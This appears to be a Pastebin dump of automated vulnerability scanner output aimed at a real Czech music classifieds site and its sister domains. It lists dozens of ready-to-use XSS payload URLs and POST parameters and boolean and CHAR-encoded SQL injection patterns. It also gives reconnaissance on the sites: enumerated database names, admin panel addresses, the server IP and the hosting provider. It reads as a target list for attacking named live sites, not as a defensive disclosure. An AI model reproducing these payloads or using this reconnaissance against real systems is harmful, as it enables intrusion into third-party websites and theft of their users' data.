Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * XSS - Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- -metod get
- http://hudebnibazar.cz/smazat.php?"></style><script>alert(9)</script>
- http://hudebnibazar.cz/formular.php?"><object/onerror=alert(9)>
- http://hudebnibazar.cz/index.php?page=1&ins=25&order="><script>alert(9)</script>&kategorie=0
- http://hudebnibazar.cz/index.php?page=1&ins=25&order=3&kategorie='"--></style></script><script>alert(0x00064D)</script>
- http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie=0&nabpop=vse®ion=3&ins="><object/onerror=alert(9)>&order=3
- http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order='"--></style></script><script>alert(0x000897)</script>
- http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse®ion=3&ins='"--></style></script><script>alert(0x00089C)</script>&order=3
- http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie=0&nabpop=vse®ion='"--></style></script><script>alert(0x0008A9)</script>&ins=25&order=3
- http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order='"--></style></script><script>alert(0x0008AA)</script>
- http://hudebnibazar.cz/smazat.php?page=1&kategorie='"--></style></script><script>alert(0x0005E9)</script>&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/formular.php?page=1&kategorie='"--></style></script><script>alert(0x0005EB)</script>&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/formular.php?page=1&kategorie="></style><script>alert(9)</script>&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/index.php?page=2&kategorie='"--></style></script><script>alert(0x000631)</script>&nabpop=vse®ion=3&fulltext=3&ins=25&order=3
- http://hudebnibazar.cz/index.php?page=1'"--></style></script><script>alert(0x0005F3)</script>&ins=25&order=3&kategorie=0
- http://hudebnibazar.cz/index.php?page=2'"--></style></script><script>alert(0x000601)</script>&kategorie=0&nabpop=vse®ion=3&fulltext=3&ins=25&order=3
- http://hudebnibazar.cz/index.php?page=1&kategorie='"--></style></script><script>alert(0x000605)</script>&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/inzerat.php?'"--></style></script><script>alert(0x000624)</script>
- http://hudebnibazar.cz/index.php?page=1&ins='"--></style></script><script>alert(0x000610)</script>&order=3&kategorie=0
- http://hudebnibazar.cz/index.php?page=1&ins="><body onload=alert(9)>&order=3&kategorie=0
- http://hudebnibazar.cz/index.php?page=2&kategorie='"--></style></script><script>alert(0x000631)</script>&nabpop=vse®ion=3&fulltext=3&ins=25&order=3
- http://hudebnibazar.cz/inzerat.php?ID='"--></style></script><script>alert(0x000632)</script>&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/formular.php?ID='"--></style></script><script>alert(0x000653)</script>&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse®ion=3&ins='"--></style></script><script>alert(0x00065E)</script>&order=3
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse®ion='"--></style></script><script>alert(0x000671)</script>&ins=25&order=3
- http://hudebnibazar.cz/smazat.php?ID='"--></style></script><script>alert(0x00067F)</script>&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse®ion='"--></style></script><script>alert(0x00069A)</script>&ins=25&order=3
- http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse®ion='"--></style></script><script>alert(0x0006BB)</script>&fulltext=3&ins=25&order=3
- http://hudebnibazar.cz/formular.php?ID=641587&page=1'"--></style></script><script>alert(0x0006CC)</script>&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order='"--></style></script><script>alert(0x0006D8)</script>
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse®ion=3&ins='"--></style></script><script>alert(0x0006DE)</script>&order=3
- http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID='"--></style></script><script>alert(0x0006EF)</script>&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/inzerat.php?ID=641587&page=1'"--></style></script><script>alert(0x000703)</script>&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x000718)</script>&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/smazat.php?ID=641587&page=1'"--></style></script><script>alert(0x000754)</script>&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/inzerat.php?ID='"--></style></script><script>alert(0x000796)</script>
- http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x0007A4)</script>&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x0007B3)</script>&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie="></style><script>alert(9)</script>&nabpop=vse®ion=3&ins=25&order=3
- http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse®ion=3&ins='"--></style></script><script>alert(0x0007B9)</script>&order=3
- http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse®ion=3&fulltext='"--></style></script><script>alert(0x0007CF)</script>&ins=25&order=3
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order='"--></style></script><script>alert(0x0007DF)</script>
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order="><object/onerror=alert(9)>
- http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=\'\"--></style></script><script>netsparker(0x0008FA)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587\0\'\"--></style></script><script>netsparker(0x00093D)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=\'\"--></style></script><script>netsparker(0x000A1F)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order='"--></style></script><script>alert(0x00091C)</script>
- http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order='"--></style></script><script>alert(0x000961)</script>
- http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse®ion=3&fulltext=3&ins="></script><script>alert(9)</script>&order=3
- http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse®ion=3&fulltext=3&ins=25&order='"--></style></script><script>alert(0x00096F)</script>
- http://hudebnibazar.cz/zaslatheslo.php?'"--></style></script><script>alert(0x000999)</script>
- http://hudebnibazar.cz/zaslatheslo.php?ID=641587&back='"--></style></script><script>alert(0x0009B8)</script>
- http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=641587&page=1&kategorie=0&nabpop=vse®ion=3&ins='"--></style></script><script>alert(0x0009E2)</script>&order=3
- http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=641587&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order='"--></style></script><script>alert(0x0009EC)</script>
- http://hudebnibazar.cz/index.php/"ns="alert(0x0005D6)
- Parameter Name: URI-BASED
- Parameter Type: RawUrlInjection
- Attack Pattern: /"ns="alert(0x0005D6)
- - metod post
- http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
- Parameter Name: kategorie
- Parameter Type: Post
- Attack Pattern: "></script><script>alert(9)</script>
- -
- http://hudebnibazar.cz/smazat.php
- Parameter Name: page
- Parameter Type: Post
- Attack Pattern: 1'"--></style></script><script>alert(0x000974)</script>
- -
- http://hudebnibazar.cz/smazat.php
- Parameter Name: region
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x00097F)</script>
- -
- http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Parameter Name: replyto
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0009AD)</script>
- -
- http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=\0\'\"--></style></script><script>netsparker(0x0009C5)</script>
- Parameter Name: sess
- Parameter Type: Post
- Attack Pattern: page=1&kategorie=0&nabpop=vse®ion=&ins=25&order='"--></style></script><script>alert(0x0009C5)</script>
- -
- http://hudebnibazar.cz/formular.php?ID=\'\"--></style></script><script>netsparker(0x000A63)</script>&err=he&NactiZeSess=1
- Parameter Name: ID
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000A63)</script>
- -
- http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Parameter Name: textodpovedi
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000A04)</script>
- -------------------------------------------------------------------------
- * [Possible] Permanent Cross-site Scripting
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Vulnerable URL: http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
- Injection URL: http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
- Parameter Name: heslo2
- Parameter Type: Post
- Attack Pattern: 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'
- Vulnerable URL: http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Injection URL: http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Parameter Name: p_spam
- Parameter Type: Post
- Attack Pattern: '+NSFTW+'
- -------------------------------------------------------------------------
- * COOKIE SQL INJECTION
- ReferURL http://hudebnibazar.cz/index.php^fulltext=___640085
- Parameter fulltext=___640085
- Type String
- KWordActionURL Electro
- -
- ReferURL http://hudebnibazar.cz/index.php?order=&kategorie=0&page=1^ins=25
- Parameter ins=25
- Type Integer
- KWordActionURL Electro
- -------------------------------------------------------------------------
- * URL SQL INJECTION
- http://hudebnibazar.cz/index.php?page=1&nabpop=vse®ion=&ins=25&order=&kategorie=310000
- http://hudebnibazar.cz/index.php?page=1&nabpop=vse®ion=&ins=25&order=&kategorie=99999999
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=640085
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=99999999
- http://hudebnibazar.cz/formular.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=640085
- http://hudebnibazar.cz/formular.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=99999999
- http://hudebnibazar.cz/inzerat.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=640085
- http://hudebnibazar.cz/inzerat.php?page=1&kategorie=310000&nabpop=vse®ion=&ins=25&order=&ID=99999999
- http://hudebnibazar.cz/inzerat.php?order=&ID=640085&page=1&kategorie=310000&nabpop=vse®ion=&ins=25
- http://hudebnibazar.cz/zaslatheslo.php?back=smazat&ID=640085
- http://hudebnibazar.cz/zaslatheslo.php?back=smazat&ID=99999999
- -------------------------------------------------------------------------
- * Database User Has Admin Privileges
- Vulnerability Classifications: OWASP A6 CWE-16
- http://hudebnibazar.cz/formular.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- -------------------------------------------------------------------------
- * Boolean Based SQL Injection
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/formular.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/index.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/index.php?page=1&ins=25&order=3&kategorie=-1 OR 17-7=10
- Parameter Name: kategorie
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/formular.php?ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/smazat.php?ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse®ion=3&ins=25&order=3
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/inzerat.php?ID=-1 OR 17-7=10
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/smazat.php
- Parameter Name: kategorie
- Parameter Type: Post
- Attack Pattern: -1 OR 17-7=10
- http://hudebnibazar.cz/zaslatheslo.php?ID=-1 OR 17-7=10&back=formular
- Parameter Name: ID
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- -------------------------------------------------------------------------
- * Password Transmitted Over HTTP
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- http://hudebnibazar.cz/formular.php?ID=641587&err=he&NactiZeSess=1
- Form target action: vloz2db.php
- -------------------------------------------------------------------------
- * Cookie Not Marked As HttpOnly
- Vulnerability Classifications: OWASP A6 CWE-16
- http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Identified Cookie: lastvisittemp
- .
- http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Identified Cookie: cook_ins
- .
- http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Identified Cookie: lastvisittemp
- .
- http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse®ion=&ins=25&order=
- Identified Cookie: lastvisittemp
- .
- http://hudebnibazar.cz/zaslatheslo.php?ID=641587&back=smazat
- Identified Cookie: lastvisittemp
- .
- http://hudebnibazar.cz/odpoved.php
- Identified Cookie: PHPSESSID
- Parameter Name: asp
- Parameter Type: Post
- Attack Pattern: data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwOEU1KTwvc2NyaXB0Pg==
- .
- http://hudebnibazar.cz/vloz2db.php
- Identified Cookie: PHPSESSID
- Parameter Name: kategorie
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- .
- +++++++++++++++++++++++++++++++++++++++++++++++
- Servery a jejich databáze
- Web Server: Apache
- DB Server: MySQL
- Current DB: hudebnibazar_cz
- Data Bases: information_schema
- FuzzyOcr
- adminis_kytary_cz
- forum_kytary_cz
- hudebnibazar_bak
- hudebnibazar_cz
- hudebnimagazin_cz
- iphone_inzerce
- iphonebazar_cz
- mail
- mysql
- openx_kytary_cz
- reklama_kytary_cz
- search_engine_position
- http://hudebniforum.cz - http://hudebniforum.cz/hudebnibazar-cz
- http://hudebnimagazin.cz
- http://kytary.cz - http://eshop.kytary.cz
- ---------------------------------------
- http://iphonebazar.cz
- XSS
- Vulnerable URL : http://iphonebazar.cz/?q=node/'" ns=netsparker(0x000CEF) &page='" ns=alert(0x000CEF)
- ---------------------------------------
- http://forum.kytary.cz
- http://openx.kytary.cz/www/admin/index.php / Welcome to OpenX
- http://reklama.kytary.cz/admin/index.php / Vítejte v Openads
- http://kacenka.kytary.cz - sdilena IP
- http://kacenka2.kytary.cz - Not Found, pouze Apache - 87.236.194.214 --------------
- ---------------------------------------
- whois
- IP address [?]: 87.236.194.214
- CZ
- Czech Republic
- COOLHOUSING s.r.o.
- Organization: Coolhousing
- Host of this IP: [?]: smtp2.mail.kytary.cz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement